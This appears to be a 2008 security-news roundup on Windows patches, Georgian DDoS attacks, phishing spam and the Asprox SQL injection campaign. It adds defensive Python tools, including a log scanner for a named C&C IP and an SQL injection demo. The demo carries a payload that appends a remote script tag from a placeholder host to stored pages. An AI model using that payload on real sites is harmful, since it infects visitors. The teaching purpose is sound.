Microsoft has released six critical patches and five patches rated important, addressing a total of 26 vulnerabilities. All six critical updates address remote code execution flaws in Internet Explorer, Office components (Access, Excel, PowerPoint and image filters) and Windows image handling.
The full bulletin can be found here. Here is a brief summary of the critical flaws:
CVE-2008-2254, CVE-2008-2255, CVE-2008-2256, CVE-2008-2257, CVE-2008-2259 and CVE-2008-2258: These patches fix IE 5 through 7 on various flavors of Windows and address HTML object memory corruption vulnerabilities along with other memory corruption issues.
CVE-2008-3004, CVE-2008-3005, CVE-2008-3006, CVE-2008-3003: These patches address four vulnerabilities in Excel that could lead to remote code execution. An attacker could take advantage of the way Excel processes array indexes, values loaded into memory, record values and connections to third-party data.
CVE-2008-0120, CVE-2008-0121 and CVE-2008-1455: Microsoft says: This security update resolves three privately reported vulnerabilities in Microsoft Office PowerPoint and Microsoft Office PowerPoint Viewer that could allow remote code execution if a user opens a specially crafted PowerPoint file. An attacker who successfully exploited any of these vulnerabilities could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Office 2000, 2003 and 2007 are impacted.
CVE-2008-3019, CVE-2008-3018, CVE-2008-3021, CVE-2008-3020, CVE-2008-3460: Microsoft patched vulnerabilities that could allow remote code execution if a user viewed a specially crafted image file using Microsoft Office. Office 2000, Office 2003 and Project 2002 are affected.
CVE-2008-2245: Microsoft fixed a remote code execution vulnerability in the way the Microsoft Color Management System (MSCMS) module of the Microsoft ICM component handles memory allocation. The vulnerability could allow remote code execution if a user opens a specially crafted image file. Affected software includes Windows 2000, XP and Server 2003.
CVE-2008-2463: This patch addresses an arbitrary file download vulnerability in the Snapshot Viewer ActiveX control for Microsoft Access, which ships with Access in Office 2000, Office XP and Office 2003.
Both servers and (particularly) desktops will need patching to defend against the flaws, which affect the full range of Windows systems and many versions of Office. The total number of vulnerabilities addressed in this batch is the highest in two years.
Two of the patches cover vulnerabilities that had already been actively exploited, according to net security firm McAfee. Opening a rigged image or Office file, as well as drive-by download attacks, are all possible exploit scenarios for these flaws, which cover bugs in the Snapshot Viewer ActiveX control for Microsoft Access and a flaw in Word. Microsoft, for some reason, rates the Word flaw only as “important” rather than critical.
McAfee reckons that the updates fixing image processing flaws and the cumulative update for Internet Explorer are also likely targets for attacks and ought to receive prompt triage by sysadmins.
Microsoft had originally planned to publish twelve bulletins on Tuesday but pulled one because of a “last minute quality issue”, a posting on Microsoft's Security Response Center blog explains.
The conflict between Georgia and Russia on the ground has been accompanied by renewed cyber-attacks against Georgian government websites. The Georgian presidential site (www.president.gov.ge) and other government websites (such as www.parliament.ge) were left inaccessible by assaults over the weekend, in a repeat of attacks in late July, before tensions over the breakaway region of South Ossetia spilled over into armed conflict.
After a week of discussions on Russian Internet forums, a coordinated cyber attack was launched against Georgia's Internet infrastructure. The attacks have already compromised several government web sites, and continuing DDoS attacks against numerous other Georgian government sites have forced the government to switch to hosting in the U.S.; Georgia's Ministry of Foreign Affairs moved to a Blogspot account.
The DDoS attack appears to be using a Russian malware variant from the Pinch family and a command and control server based in Turkey. Nationalist articles in Russian-language papers are apparently inspiring Russia's digital underground to join the assaults on Georgia's web-facing systems.
Unconfirmed reports claim the notorious Russian Business Network (RBN) is behind the attacks and that Georgian internet servers were taken over by foreign attackers on Thursday, the day before Russian tanks rolled into South Ossetia. The peak of the DDoS attack and the actual defacements started on Friday. Several Georgian state servers have been under external control since shortly before Russia's armed intervention began on Friday, leaving the state's online presence in disarray. While the official website of Mikheil Saakashvili, the Georgian President, has become available again, the central government site, as well as the homepages of the Ministry of Foreign Affairs and the Ministry of Defence, remain down. Some commercial websites have also been hijacked.
The Georgian government said that the disruption was caused by attacks carried out by Russia as part of the ongoing conflict between the two states over the Georgian province of South Ossetia. In a statement released via a replacement website built on Google's blog-hosting service, the Georgian Ministry of Foreign Affairs said that a cyber warfare campaign by Russia is seriously disrupting many Georgian websites, including that of the Ministry itself.
The DDoS attacks are so sustained that the Georgian President's web site has been moved to Atlanta. The original servers located in Georgia were “flooded and blocked by Russians” over the weekend, Nino Doijashvili, chief executive of Atlanta-based hosting company Tulip Systems Inc., said on Monday. The Georgian-born Doijashvili happened to be on vacation in Georgia when fighting broke out on Friday. She cold-called the government to offer her help and on Saturday transferred president.gov.ge and rustavi2.com, the web site of a prominent Georgian TV station, to her company's servers.
More defacements of news sites and popular Georgian portals followed. Two news websites run by breakaway South Ossetia were hacked on Tuesday morning, officials from the secessionist authorities said. The front page of the OSinform news agency website (osinform.ru), run by the breakaway region's state radio and television station IR, retained the agency's header and logo, but the rest of the page displayed the content of Alania TV's website, including its news and images. Alania TV is supported by the Georgian government and targets audiences in the breakaway region. Another website of the region's radio and television station, osradio.ru, was also hacked. Alania TV denied any involvement, saying it was itself surprised to see its content on the rival news agency's website.
Shortly after Civil.ge ran the story it came under DDoS attack and, like Georgia's Ministry of Foreign Affairs, switched to a Blogger account in case its own site remained unavailable. Shadowserver also posted details on the command and control servers used in the DDoS attacks:
With the recent events in Georgia, we are now seeing new attacks against .ge sites. www.parliament.ge & president.gov.ge are currently being hit with http floods. In this case, the C&C server involved is at IP address 79.135.167.22 which is located in Turkey. We are also observing this C&C as directing attacks against www.skandaly .ru. Traffic from your network to this IP or domain name of googlecomaolcomyahoocomaboutcom .net may indicate compromise and participation in these attacks.
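The Shadowserver note above is an indicator list, and the practical follow-up for a network defender is to sweep outbound proxy or firewall logs for those indicators. What follows is an added example, not code from the original post or from Shadowserver: it parses squid-style access log lines and reports every internal client that reached the quoted C&C IP or domain (including any subdomain of it). The log lines, the client addresses and the URLs in SAMPLE_LOG are constructed for the example; only the IP 79.135.167.22 and the googlecomaolcomyahoocomaboutcom.net domain come from the note.

```python
import ipaddress
from urllib.parse import urlsplit

# Indicators quoted in the Shadowserver note.
IOC_IPS = {"79.135.167.22"}
IOC_DOMAINS = {"googlecomaolcomyahoocomaboutcom.net"}

# Constructed sample in squid's native access.log layout (not a real capture):
# time elapsed client result/status bytes method url user peer/host type
SAMPLE_LOG = """\
1218380001.123   45 10.0.0.15 TCP_MISS/200  512 GET http://www.example.invalid/ - DIRECT/198.51.100.7 text/html
1218380002.456   30 10.0.0.23 TCP_MISS/200  128 GET http://googlecomaolcomyahoocomaboutcom.net/cmd.php - DIRECT/79.135.167.22 text/plain
1218380003.789   12 10.0.0.42 TCP_MISS/200   64 GET http://79.135.167.22/ping - DIRECT/79.135.167.22 text/plain
1218380004.000   10 10.0.0.15 TCP_MISS/200  256 GET http://mail.googlecomaolcomyahoocomaboutcom.net/ - DIRECT/203.0.113.9 text/html
"""


def is_ioc_ip(value):
    """True if value parses as an IP address that is on the indicator list."""
    try:
        return str(ipaddress.ip_address(value)) in IOC_IPS
    except ValueError:
        return False


def is_ioc_domain(host):
    """Exact or subdomain match against the indicator domains (case-insensitive)."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)


def parse_line(line):
    """Pull client, requested host and upstream peer out of one squid log line."""
    fields = line.split()
    if len(fields) < 9:
        return None
    return {
        "client": fields[2],
        "host": urlsplit(fields[6]).hostname or "",
        "peer": fields[8].split("/", 1)[-1],   # "DIRECT/1.2.3.4" -> "1.2.3.4"
    }


def find_c2_contacts(log_text):
    """Map each client that touched an indicator to the set of indicators hit."""
    contacts = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = set()
        for value in (rec["host"], rec["peer"]):
            if is_ioc_ip(value):
                hits.add("ip:" + value)
        if is_ioc_domain(rec["host"]):
            hits.add("domain:" + rec["host"])
        if hits:
            contacts.setdefault(rec["client"], set()).update(hits)
    return contacts


if __name__ == "__main__":
    for client, hits in sorted(find_c2_contacts(SAMPLE_LOG).items()):
        print(client, sorted(hits))
```

Matching on both the requested host and the upstream peer catches clients that resolved the C&C name themselves as well as those that connected to the bare IP; the subdomain check stops a lookalike such as notgooglecomaolcomyahoocomaboutcom.net from being flagged by a naive suffix match.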
Interest in cyber attacks as an adjunct to real-world conflict has grown since denial of service attacks took out the internet infrastructure of Estonia in April last year. Those attacks coincided with a dispute over the relocation of a WWII-era monument and affected Estonian parliament, bank, newspaper and government sites.
The assaults were blamed on Russian nationalists. Estonian Foreign Minister Urmas Paet suggested that the Kremlin may have had a hand in the attacks, but no hard evidence has emerged to substantiate the accusation. Only one person, a locally resident ethnic Russian, was convicted over the attacks.
An independent security research firm has announced several new mobile Java (J2ME) security vulnerabilities. Two of the vulnerabilities affect the Java virtual machine (JVM) on mobile phones and the other 14 are specific to Nokia Series 40 phones. Series 40 phones are not Symbian smartphones and only run J2ME MIDlets.
The firm has produced a 170+ page report on the vulnerabilities and a number of proof of concept (PoC) exploits. Usually when a researcher develops PoC code or malicious samples, they provide them directly to the security research community. In this case, the researchers are asking for €20,000 (about $30,000) for early access to the research and the malware. Once vulnerability information is released, attackers generally attempt to write exploits.
The reported JVM vulnerabilities and exploits could allow untrusted Java MIDlets to run. Once those are used, relatively recent phones running Series 40 3rd Edition are open to malicious MIDlets that exploit the remaining phone-specific flaws.
According to the researchers the vulnerabilities allow:
gaining additional privileges for a malicious MIDlet, even at manufacturer or mobile carrier level
running a malicious MIDlet when the phone is first turned on
accessing files
sending SMS/MMS
making phone calls
reading your contacts
accessing the SIM card
eavesdropping using the camera and microphone
Java phones used to be affected by malware such as J2ME/Redbrowser or J2ME/Wesber, which merely ran up premium-rate charges. This is the first time such phones have been vulnerable to more damaging malware.
According to iPhone hacker Jonathan Zdziarski, Apple has prepared a blacklisting mechanism that allows the company to remotely disable applications on any iPhone. Apparently the 2.x firmware contains a URL pointing to a page with a list of “unauthorized” apps, which suggests the device occasionally contacts Apple's servers to check whether anything on the phone should be disabled.
Zdziarski says this suggests the iPhone calls home once in a while to find out which applications it should turn off. At the moment no apps have been blacklisted, but by all appearances the mechanism was added so that Apple can disable applications the user has already downloaded and paid for, should it choose to. It was discovered during a forensic examination of an iPhone 3G, tucked away in a configuration file deep inside CoreLocation.
If Apple is indeed monitoring iPhones, or plans to remotely scan them for “unauthorized” applications, it indicates a problem deeper than a company simply wanting its software signed and certified. Even on platforms like Symbian, which require apps to be signed and traceable, the idea that an OS process would actively monitor, report on and possibly deactivate your device's software is unreasonable, and clearly presents an issue the company will have to deal with sooner or later.
Another round of fake “authority” email has been launched, this time a bogus Internet Explorer 7 (IE7) update spam. Here is the current version of the email (it will probably change a bit soon):
From: admin@microsoft.com
Subject: Internet Explorer 7
Message: You are receiving this e-mail because you subscribed to MSN Featured Offers. Microsoft respects your privacy. If you do not wish to receive this MSN Featured Offers e-mail, please click the “Unsubscribe” link below. This will not unsubscribe you from e-mail communications from third-party advertisers that may appear in MSN Feature Offers. This shall not constitute an offer by MSN. MSN shall not be responsible or liable for the advertisers’ content nor any of the goods or service advertised. Prices and item availability subject to change without notice.
File name in attachment: update.exe
Obviously, Microsoft is not responsible: it is not an update and it is not from them. The responsible one, as usual, is the user who opens attachments or clicks links in email from unknown senders without verifying their authenticity. If you run any anti-virus product you are most likely protected, since according to VirusTotal, 33 out of 36 anti-virus vendors detect this malware.
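Verifying authenticity is better done at the mail gateway than by the user. As an added example (not code from the original post), here is a small Python checker that parses a raw message, compares the domain of the visible From header with the envelope sender in Return-Path, and flags attachments that are executable either by file name or by the PE “MZ” magic bytes, which catches an .exe renamed to something harmless. The sample message is constructed to resemble the spam above; its Return-Path, Received line, addresses and the 12-byte attachment body are made up and the attachment is only a header stub, not real malware.

```python
import email
from email import policy
from email.utils import parseaddr

# Constructed sample modelled on the spam described above (not a real capture).
SAMPLE = b"""Return-Path: <bounce@mail.example.invalid>
Received: from mx.example.invalid (mx.example.invalid [203.0.113.5])
From: admin@microsoft.com
Subject: Internet Explorer 7
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

You are receiving this e-mail because you subscribed to MSN Featured Offers.
--b1
Content-Type: application/octet-stream; name="update.exe"
Content-Disposition: attachment; filename="update.exe"
Content-Transfer-Encoding: base64

TVqQAAMAAAAEAAAA
--b1--
"""

# Extensions Windows will execute on double-click; an assumed, deliberately short list.
EXECUTABLE_SUFFIXES = (".exe", ".scr", ".com", ".pif", ".bat", ".cmd")


def parse(raw_bytes):
    """Parse raw RFC 5322 bytes into an EmailMessage (modern email API)."""
    return email.message_from_bytes(raw_bytes, policy=policy.default)


def sender_domains(msg):
    """Domain of the visible From header and of the envelope sender (Return-Path)."""
    from_dom = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    rp_dom = parseaddr(msg.get("Return-Path", ""))[1].rpartition("@")[2].lower()
    return from_dom, rp_dom


def executable_attachments(msg):
    """File names of attachments that look executable by suffix or by MZ magic."""
    found = []
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        data = part.get_payload(decode=True) or b""   # base64 is decoded here
        if name.endswith(EXECUTABLE_SUFFIXES) or data[:2] == b"MZ":
            found.append(name)
    return found


def assess(raw_bytes):
    """Return a list of human-readable reasons to distrust the message."""
    msg = parse(raw_bytes)
    reasons = []
    from_dom, rp_dom = sender_domains(msg)
    # Bulk senders often use a subdomain for bounces, so allow rp_dom under from_dom.
    if from_dom and rp_dom and rp_dom != from_dom and not rp_dom.endswith("." + from_dom):
        reasons.append("envelope sender %s does not match From domain %s" % (rp_dom, from_dom))
    for name in executable_attachments(msg):
        reasons.append("executable attachment %s" % name)
    return reasons


if __name__ == "__main__":
    for reason in assess(SAMPLE):
        print(reason)
```

The envelope/From comparison is only a heuristic (legitimate mailing-list traffic often fails it too), so treat it as one signal to combine with SPF or DKIM results from the receiving MTA; an executable attachment from an unsolicited sender, on the other hand, is reason enough to quarantine on its own.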
A researcher specializing in website security, Robert Hansen, CEO of SecTheory, has strongly criticized security at Google, arguing that the world's biggest search engine needlessly puts its millions of users at risk. According to him, Google is, will be and always has been vulnerable. “They haven't been open with consumers. Ultimately, this all comes down to the fact that they just want to track you guys,” he said at the Defcon security conference in Las Vegas.
The problem is Google's hosting of untested third-party applications (gadgets) that users can embed into personalized Google home pages. In a talk titled “Xploiting Google Gadgets: Gmalware & Beyond,” Hansen and fellow researcher Tom Stracener laid out a variety of attacks that can be launched using these programs.
The most serious is the ability of a Google gadget to immediately redirect a victim who logs into iGoogle.com to a page under the attacker's control. This creates a phishing hazard, particularly for less tech-savvy users who don't know to check the address bar. Even if they do, the bar shows gmodules.com, an address many mistakenly believe is safe because it is maintained by Google.
Google gadgets make other attacks possible, including the ability to:
carry out port scanning on a victim’s internal network to conduct surveillance
use cross-site request forgery techniques to force victim PCs to follow links to malicious sites (for instance, those that host child pornography)
cause a victim’s browser to access a home router and change domain name system server addresses or other sensitive settings.
Hansen and Stracener acknowledged that in-the-wild attacks that use Google gadgets are rare, but they said that’s likely to change. “Once money actually starts flowing through, once the financial incentive for malware exists, then you’re going to start seeing more of this type of thing pop up,” Stracener said.
According to Google security engineers, the redirection is a feature rather than a flaw. Google regularly scans gadgets for malicious code, and on the “very rare” occasions that bad applications are found, they are immediately quarantined.
The speakers took strong exception to Google's claim. They have had several proof-of-concept gadgets hosted on Google for months, and so far none has been removed, they said.
It is important to remember that users must manually add a potentially dangerous gadget to their Google homepage before they can be attacked through it. Since no real attack has been seen so far, a working campaign would apparently require considerable effort: finding and targeting users who actually use the Google homepage, change it regularly enough, add untested third-party gadgets and run no anti-virus.
According to a breach notification filed with the New Hampshire State Attorney General, a significant number of unauthorized transactions were made using Wells Fargo's access codes.
Wells Fargo Bank, N.A. was advised by a reseller of consumer data, including consumer credit bureau data, of suspicious transactions made using Wells Fargo access codes. The investigation confirmed that a significant number of unauthorized transactions had been made. At this time, Wells Fargo does not know how its codes were compromised.
The information currently available indicates that personal information, including name, address, date of birth, social security number and driver's license number and, in some cases, credit account information, was accessed by an unauthorized person or persons. About 7,000 individuals are affected by this incident.
Wells Fargo has notified the United States Secret Service, which is investigating the matter. It has already mailed about 2,410 of the affected clients and is currently attempting to find usable addresses for the remaining individuals.
Wells Fargo has arranged a free one-year membership to Identity Guard CreditProtectX3 for affected clients. To sign up for this service at no cost, take one of the following actions by September 15, 2008: visit www.identityguard.com/alert or call 1-866-271-9434.
For questions, call 1-866-716-9460, beginning Friday, August 1, 2008. Phone bankers are available Tuesday through Friday between 9:00am and 6:00pm Pacific Time.
A new round of SQL injection attacks (most likely by Asprox) has infected millions of web pages belonging to businesses and government agencies, including the National Institutes of Health and the Education Department in the US and UK Trade & Investment. Many of the domains involved are still (or again) active, typically using fast flux. The injected script tends to be ngg.js, fgg.js, b.js or js.js, and it links to an IP address that is still active.
A simple Google search shows at least 1,470,000 infected pages, some on US and UK government websites hit by the attack. The attack is popular and not hard to perform, which is worrying where government-run websites are concerned. About 591,000 pages are infected with b.js, which seems to point to inactive domains, so these are unlikely to do damage. The rest is a mixture of active and inactive links.
A quick breakdown by SANS shows the numbers of infected sites:
.gov - 238
.gov.au - 927
.gov.uk - 2,930
.gov.cn - 34,000
.gov.za - 424
.gov.br - 263
.com - 474,000
.org - 79,900
.com.au - 19,500
.co.uk - 19,300
.ca - 13,100
The high number of infected sites points to two issues: first, sites are compromised and nobody notices; second, infected sites are not cleaned up. To check your own website, run the following Google search, replacing domain.com with your own domain. If the search returns results, you have to clean your website, since it is infecting its visitors:
site:domain.com "script src=http://*/" "ngg.js"|"js.js"|"b.js"
SQL injection takes advantage of web applications that splice user-supplied data straight into a query instead of inspecting it or, better, binding it as a parameter. The input is usually entered into search boxes or other fields that interact with the site's SQL database. Commands embedded in the input instruct the database to append script tags to stored content, which then redirect visitors to websites under the attackers' control.
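The mechanism in the last paragraph, and the self-check in the one before it, are easier to see in a runnable toy. The following is an added example written for this page, not Asprox's code or any affected site's code: a two-row "posts" table behind a search box, one search built by string concatenation and one using a bound parameter, a constructed attacker term that closes the LIKE string and stacks an UPDATE appending a remote script tag to every stored body, and a local scanner that does for a saved page what the Google query above does for indexed ones. SQLite stands in for the SQL Server back ends hit by the campaign; executescript() is used in the vulnerable path because it runs stacked statements the way those back ends did. The host malicious.invalid is a placeholder.

```python
import re
import sqlite3
from urllib.parse import urlsplit

# File names the text reports the campaign injecting.
SCRIPT_NAMES = {"ngg.js", "fgg.js", "b.js", "js.js"}
SCRIPT_SRC_RE = re.compile(r"<script[^>]*\bsrc\s*=\s*[\"']?(https?://[^\"'\s>]+)", re.I)

# Constructed attacker input: ends the LIKE string, stacks an UPDATE that
# appends a script tag to every body, and leaves a dangling quote that the
# application's own trailing %' completes into WHERE '' <> '%' (always true).
PAYLOAD = ("x%'; UPDATE posts SET body = body || "
           "'<script src=http://malicious.invalid/ngg.js></script>' WHERE '' <> '")


def new_db():
    """Fresh in-memory site content (constructed sample data)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO posts (title, body) VALUES ('Welcome', '<p>Hello</p>');
        INSERT INTO posts (title, body) VALUES ('News', '<p>More</p>');
    """)
    return db


def search_vulnerable(db, term):
    """The flaw: user input concatenated into SQL and run as a script."""
    sql = "SELECT id FROM posts WHERE title LIKE '%" + term + "%';"
    db.executescript(sql)   # every statement in the string is executed


def search_safe(db, term):
    """The fix: the term is bound as one value; quotes and ; are just data."""
    rows = db.execute("SELECT id FROM posts WHERE title LIKE ?",
                      ("%" + term + "%",)).fetchall()
    return [r[0] for r in rows]


def render_page(db):
    """What a visitor's browser would receive."""
    rows = db.execute("SELECT title, body FROM posts ORDER BY id").fetchall()
    return "".join("<h2>%s</h2>%s" % (title, body) for title, body in rows)


def find_injected_scripts(html):
    """Remote script tags whose file name matches the campaign's."""
    hits = []
    for src in SCRIPT_SRC_RE.findall(html):
        name = urlsplit(src).path.rsplit("/", 1)[-1].lower()
        if name in SCRIPT_NAMES:
            hits.append(src)
    return hits


def demo():
    """Attack both variants; return the injected URLs found in each page."""
    bad = new_db()
    search_vulnerable(bad, PAYLOAD)
    good = new_db()
    search_safe(good, PAYLOAD)
    return find_injected_scripts(render_page(bad)), find_injected_scripts(render_page(good))


if __name__ == "__main__":
    injected_bad, injected_good = demo()
    print("vulnerable site now serves:", injected_bad)
    print("parameterised site serves:", injected_good)
```

The scanner is deliberately name-based, matching the Google query above; when cleaning up, also grep the database itself for the tag, because the campaign wrote it into every text column it could reach, not just the ones a single page renders.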
Websense has discovered that another CNET Networks site, the CNET Clientside Developer Blog, has been compromised, just five months after a previous incident. The main page of the site contains malicious JavaScript that de-obfuscates into an iframe loading its primary payload from a different host. The JavaScript attempts to fetch the live exploit URL from a .info domain that is now down.
The malicious code exploits a known integer overflow vulnerability in Adobe Flash (CVE-2007-0071). At the time of the alert the site was still hosting the malicious code. Visitors not patched against this vulnerability will be infected without any user interaction.
The Clientside developer blog has been seeded with malicious JavaScript that attempts to exploit visitors through a well-known vulnerability in Adobe's Flash Player. Vulnerable software includes Adobe Flash Player 9.0.115.0 and earlier, Adobe Flex 3.0 and Adobe AIR 1.0.
This attack is not an isolated event. Attacks in which legitimate sites serve malware and exploits have lately become very popular, and multiple vendors confirm the trend: in its latest report ScanSafe found a 407 percent increase in compromises of legitimate websites; according to Sophos, 79 percent of malware-hosting websites are legitimate ones; according to Websense, more than 75 percent of websites classified as malicious were actually legitimate. These studies show that the old advice to “stay away from unknown websites” is becoming irrelevant.
A known social engineering tactic involving Adobe Flash Player is being used in a currently active malware campaign. The spammed user is encouraged to click through to a site with a fake news item in order to install a fake Flash Player update (file names include flashupdate.exe, get_flash_update.exe and watchmovie.mpg.exe). If the user clicks “Cancel” in the dialog that prompts for the update, another pop-up appears telling the victim that the download is required to view the video. Clicking “Cancel” there returns the user to the first dialog, a perpetual loop in which the only options are to kill the browser session or install the malware. According to MX Logic, this campaign sent over 80 million messages in the past 24 hours, at about 5 million per hour.
This campaign uses fake CNN News Update spam, with subjects like “CNN.com Daily Top 10”. The tactic is likely to be more successful than the single-line spam seen over the past several weeks, because the message looks like a news update email sent by CNN. It also tries to convince the user that they signed up for it through their email preference settings at the CNN website. If you see this message in your inbox, delete it immediately.
Thousands of legitimately run but hacked websites, along with domains registered purposely for abuse, are currently participating, and the malware authors continue to use older client-side exploits like those detected in ThreatFire's assessment at the end of July. Users who click on any of these news topics might not even get the chance to refuse the download of the infected binary. Exploits involved in these attacks include:
Old MS06-014 MDAC Vulnerability
New Microsoft Office Snapshot Viewer ActiveX control vulnerability
One year old Online Media Technologies NCTsoft NCTAudioFile2 ActiveX buffer overflow
One year old stack overflow in GomManager
Recent RealPlayer.Console heap vulnerability
Two years old WebViewFolderIcon.setSlice integer overflow vulnerability
Rogue media codecs are being replaced by fake Windows Media Players and other legitimate-looking players, since today's fake applets impersonate legitimate software. Instead of trying to build trust in an unknown brand, criminals impersonate and abuse known brands and their software, which increases the probability that someone will click.
The abuse is serious enough that Adobe has issued a Security Bulletin warning of malware spreading via a fraudulent Flash Player installer. Adobe warns that worms are making fraudulent posts on social networking sites. These posts include links to fake sites, just like the spammed ones, that prompt users to update their Flash Player. If users run the installer to make the update, malware may be downloaded and installed on their systems.
Update (August 13): Another round of malware spam has been launched, this time featuring MSNBC instead of CNN:
Subject: MSNBC Breaking News
Title: msnbc.com - BREAKING NEWS: <some bogus news here>
If you see this message in your inbox, delete it immediately.